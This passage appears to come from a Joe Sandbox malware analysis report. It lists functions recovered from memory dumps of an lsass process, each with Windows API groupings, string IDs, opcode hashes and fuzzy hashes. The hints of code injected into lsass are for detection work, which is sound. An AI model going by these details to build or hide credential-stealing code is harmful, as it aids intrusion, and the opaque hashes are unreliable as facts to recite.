                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE9997
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000213BDCE9A2B,?,?,?,00000213BDCE921C,?,?,?,?,00000213BDCE8D25), ref: 00000213BDCE99A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                  • String ID: api-ms-
                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                  • Opcode ID: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction ID: 86894928232fa96f08b18e098bcd1db2f16ce1c2bd2bea712a89d2e3e82895e7
                                                                                                                                  • Opcode Fuzzy Hash: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction Fuzzy Hash: 3C31C27121A74492EE52DB02A8087D53396F764BACF590635ED1D4B394FF3AE7458310
                                                                                                                                  Function 00000213BDCF31C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                  • String ID: CONOUT$
                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                  • Opcode ID: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction ID: 331ab3ca0ef663983298ce67873e33f52ce695d8b1efebd71c3a598c95dc751e
                                                                                                                                  • Opcode Fuzzy Hash: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction Fuzzy Hash: 89118931318A4086EB51CB56F8687D966A1F7A8FECF044224DB5D4B798EF39CB488744
                                                                                                                                  Function 00000213BDCE3C98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                  • String ID: wr
                                                                                                                                  • API String ID: 1092925422-2678910430
                                                                                                                                  • Opcode ID: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction ID: 5b4ad10cd0dc433e41f55fd6327e5eb677fe9a2a91a14cd81998f784656447ff
                                                                                                                                  • Opcode Fuzzy Hash: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction Fuzzy Hash: C0115A76318B4083EF14DB21E4086A966A2FB58B8DF050425DE8D0B758FE3EDB488700
                                                                                                                                  Function 00000213BDCE6030 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1666949209-0
                                                                                                                                  • Opcode ID: 51c1995138fd7319943032f34732079ccf3b7c8e074de6032c9de460bc6c2048
                                                                                                                                  • Instruction ID: 5ed66f8a6edf6f1cbbc991e688c0fab68562894523715429cec8b38c5a0caaa2
                                                                                                                                  • Opcode Fuzzy Hash: 51c1995138fd7319943032f34732079ccf3b7c8e074de6032c9de460bc6c2048
                                                                                                                                  • Instruction Fuzzy Hash: 22D19D76218B8882DA70DB16E49839A77A1F7D8B8CF100626EACD477A5DF3DD751CB00
                                                                                                                                  Function 00000213BDCE3398 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID: $77
                                                                                                                                  • API String ID: 756756679-3904844309
                                                                                                                                  • Opcode ID: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction ID: 71a4031cfc771cdeeb36dfc57045659458c0ed6ff9048a24184771493a200819
                                                                                                                                  • Opcode Fuzzy Hash: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction Fuzzy Hash: 4931A271309F5983EE11DF16E5482A96BA2BB64B8CF0841309F4847755FF36E7658700
                                                                                                                                  Function 00000213BDCEC700 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 365477584-0
                                                                                                                                  • Opcode ID: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction ID: c3da57012dbeac7d6f3951d7bfcf241053ca5e500fe65c64195d24b1a6eb9da0
                                                                                                                                  • Opcode Fuzzy Hash: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction Fuzzy Hash: C0118FB471825843FE54E731A9693FD1143ABA4BDCF544534B92A476C7FE3AEB024740
                                                                                                                                  Function 00000213BDCE1A30 Relevance: 9.0, APIs: 6, Instructions: 41stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4193868204-0
                                                                                                                                  • Opcode ID: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction ID: fee0974e9b98ffa0f7d58d0626406c976e93cc59ed87b5827664c6d6ef0e8a3d
                                                                                                                                  • Opcode Fuzzy Hash: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction Fuzzy Hash: 8B016D71718B4482EE10DB12E8983D96AA2F758FC8F948434DE4A47758EE3ECB498740
                                                                                                                                  Function 00000213BDCE3BE4 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 449555515-0
                                                                                                                                  • Opcode ID: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction ID: 4c77b9602abdadd43deed9360ac1099c2b696b02b9733db4fcfb427980e6c576
                                                                                                                                  • Opcode Fuzzy Hash: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction Fuzzy Hash: 06015B74619B4482EF20DB22E81C79966A2EB68B8DF040128DE4D0A368FF3EC7588700
                                                                                                                                  Function 00000213BDCE34D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CombinePath
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3422762182-91387939
                                                                                                                                  • Opcode ID: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction ID: ea8ae2e82c2f3dfea12a6639fe0a56ff0a22c0332726c452e499c2696bc0baaf
                                                                                                                                  • Opcode Fuzzy Hash: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction Fuzzy Hash: 56F089B4728B4082EE04CB17F9181D96A22AB58FCCF445430EE060B71DEE3DD74D8300
                                                                                                                                  Function 00000213BDCEB6C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction ID: 777d784f27f14ac596d33ca955d28e521a71519ded58354678ba3666b47db94c
                                                                                                                                  • Opcode Fuzzy Hash: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction Fuzzy Hash: E4F096B1218A0441EF14CB14E8483E91722EB9576CF5407299A6D495E8EF3EC74CC710
                                                                                                                                  Function 00000213BDCE55D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 3aea7139df32369f879ece52c3062891ec0d21dfbcfe470f159ab8e5a177004e
                                                                                                                                  • Instruction ID: a96d3efd0bac3b26f44bcbcfe739f7d826db2238713155c3ec2d5104b93b9a38
                                                                                                                                  • Opcode Fuzzy Hash: 3aea7139df32369f879ece52c3062891ec0d21dfbcfe470f159ab8e5a177004e
                                                                                                                                  • Instruction Fuzzy Hash: 9102ED7611DB8486DB60CB55F49439ABBA1F3D4798F100025EACE87BA8EF7DDA54CB00
                                                                                                                                  Function 00000213BDCE5C10 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 0441838d824fc983c730246148d7a7fc38d6cc047019034bf9020db6d46abb4c
                                                                                                                                  • Instruction ID: 12581f885b9df304961052a877857b167c980b6c0048a069f2a0617bc5d40fa0
                                                                                                                                  • Opcode Fuzzy Hash: 0441838d824fc983c730246148d7a7fc38d6cc047019034bf9020db6d46abb4c
                                                                                                                                  • Instruction Fuzzy Hash: A361CB7612DB48C7EB60CB15E46835ABBA1F39874CF100525EA8D47BA8EB7DDB40CB00
                                                                                                                                  Function 00000213BDCE8A60 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: 6dfb0cde515cce0873cb3727019dfe18ad19fce66b85a5adcf74bdec229b0447
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: 8D51C3B231A6048BDF18CB15E448BA83793EBA5B9CF548131DA4547788F77AEB42C704
                                                                                                                                  Function 00000213BDCEA4BC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                  • Opcode ID: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction ID: af45b79779c30aa86e09430bd9a86192ac87473652d275ddd3b9631e94d7115e
                                                                                                                                  • Opcode Fuzzy Hash: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction Fuzzy Hash: CC619E72508BC8C6EB20CB15E4443DAB7A5F7A5B9CF044225EB8847B99EB7DD390CB04
                                                                                                                                  Function 00000213BDCEA86C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: 4d176d71b41be5740d0645390df53e3248115e673b64bc7a110dcc83e15e401a
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: 2B5190B2108388CFEF74CB1295483987792E764B9CF144125EA8D87B95EB3AE751CB09
                                                                                                                                  Function 00000213BDCB9C6C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: ff0bba84c4bd9654bdab02e9ed385fe94eca48c262dc5b2e202ab88bcf602ad3
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: 655180322486888AEF74CF22944C39877A2F774B9CF144115DA9947BD5EF3ADB90CB05
                                                                                                                                  Function 00000213BDCE3720 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
